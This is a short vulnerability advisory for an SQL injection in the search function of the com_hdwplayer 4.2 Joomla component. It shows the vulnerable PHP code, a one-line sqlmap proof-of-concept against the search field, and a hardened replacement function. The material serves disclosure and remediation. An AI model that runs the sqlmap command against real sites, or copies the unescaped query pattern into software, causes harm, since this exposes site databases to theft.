Vulnerable file: components/com_hdwplayer/models/search.php (line 33)
Vulnerable function: getsearch()
Vulnerable line: 33
function getsearch() {
    $db = JFactory::getDBO();
    // The 'string' filter does not escape quotes, so $search reaches the query unescaped.
    $search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
    // $search is interpolated directly into all three LIKE clauses.
    $query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";
    $db->setQuery($query);
    $output = $db->loadObjectList();
    return($output);
}
An SQL injection issue was discovered in 'search.php' of com_hdwplayer 4.2 for Joomla!
Homepage: https://www.hdwplayer.com/
Download: https://www.hdwplayer.com/download/
Version: hdwplayer 4.2
On: Windows, MySQL, PHP 5.4, Joomla! 3.9
Author: Zeo
PoC
sqlmap.py -u "http://ip/index.php" --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" -p hdwplayersearch --method=POST --dbms=mysql --level=5 --risk=3
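
A hardened form of getsearch(), added here as an example; it is not the vendor's patch or code from the original advisory. It assumes it runs inside the component on Joomla 3.x and uses only the stock database driver and JInput calls.

```php
<?php
defined('_JEXEC') or die;

// Added example: drop-in replacement for the vulnerable getsearch().
function getsearch()
{
    $db = JFactory::getDbo();

    // Read the POST field through JInput. getString() only filters the
    // type; it does not make the value safe to place in SQL.
    $search = JFactory::getApplication()->input->post->getString('hdwplayersearch', '');

    // escape($text, true) escapes quotes and also backslash-escapes % and _,
    // so user input cannot close the string or act as a LIKE wildcard.
    // quote(..., false) adds the surrounding quotes without escaping twice.
    $like = $db->quote('%' . $db->escape($search, true) . '%', false);

    // Build the statement with the query builder and quoted identifiers
    // instead of interpolating request data into a string.
    $query = $db->getQuery(true)
        ->select('*')
        ->from($db->quoteName('#__hdwplayer_videos'))
        ->where($db->quoteName('published') . ' = 1')
        ->where(
            '(' . $db->quoteName('title') . ' LIKE ' . $like
            . ' OR ' . $db->quoteName('category') . ' LIKE ' . $like
            . ' OR ' . $db->quoteName('tags') . ' LIKE ' . $like . ')'
        );

    $db->setQuery($query);

    return $db->loadObjectList();
}
```

With this change a search term containing a quote, % or _ is matched as literal text in the title, category and tags columns.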